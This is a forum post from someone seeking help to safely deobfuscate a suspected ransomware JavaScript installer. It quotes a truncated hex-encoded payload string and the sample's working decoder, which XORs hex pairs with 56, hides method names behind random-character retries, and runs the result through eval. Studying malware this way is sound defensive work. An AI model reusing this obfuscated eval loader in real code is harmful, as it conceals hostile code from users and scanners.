Hi there folks,
I’ve received what I’m pretty sure is a ransomware installer and I’d really like to see how it works but I’m wondering how I can deobfuscate it for viewing without executing. I won’t post it in it’s entirety for obvious reasons, but it’s assigning a var in the following manner:
var e4="cb5ed34dc_56cf5bfd4cf051ea57f956"+
"ff18d15fd45dde4cae7cd759c74c_a59"+
"a97ef74ad457c655a26dfb4aea54b810"+
"d04dd14aff54fd14f618b35be359fc54"+
"e054a25af859cd5bd553d411_a43e74c"+
"b34ac_41a543fe4ed_59_44aac18_c40"+
"c155f254d570_14cd64cb748_f18f305"+
"a318a356ce5d_f4ff_18af79f25be14c"+
"a951aa4ef_5de560cd77e55af852cd5d"+
"e95b__4ccf10_31a_175aa6bac60e475"+
"bc74f_0ae716b160b_75cf74cc70ef6c"+
Which goes on for a really long time, then it handles it:
function c5()
{
var c1=new Array("a","e","s","+","g");
return c1[Math.floor(Math.random()*c1.length)];
}
function db(d5)
{
return (new Function("b8","var f0=b8.m"+c5()+"tch(/\\S{"+""+"4}/"+c5()+"),e1=\"\",e6=0"+""+";whil"+c5()+"(e6<f0.length){e1+="+""+"String.fromCharCod"+c5()+"(parseInt(f0[e6].sub"+c5()+"tr(2,2),16)^56);e6+"+c5()+";}return ev"+c5()+""+""+"l(e1);")(d5));
}
function b0(c3)
{
var c9;
var a8=0;
while(a8<1)
{
try
{
c9=db(c3);
a8++;
}
catch(cc)
{
}
}
return c9;
}
b0(e4);
Could someone explain how I might alter it to simply spit out the code in it’s entirety, instead of executing so I could see how it works?
PS: Working on a non-network-cabled machine in a VM.
Thanks for your time!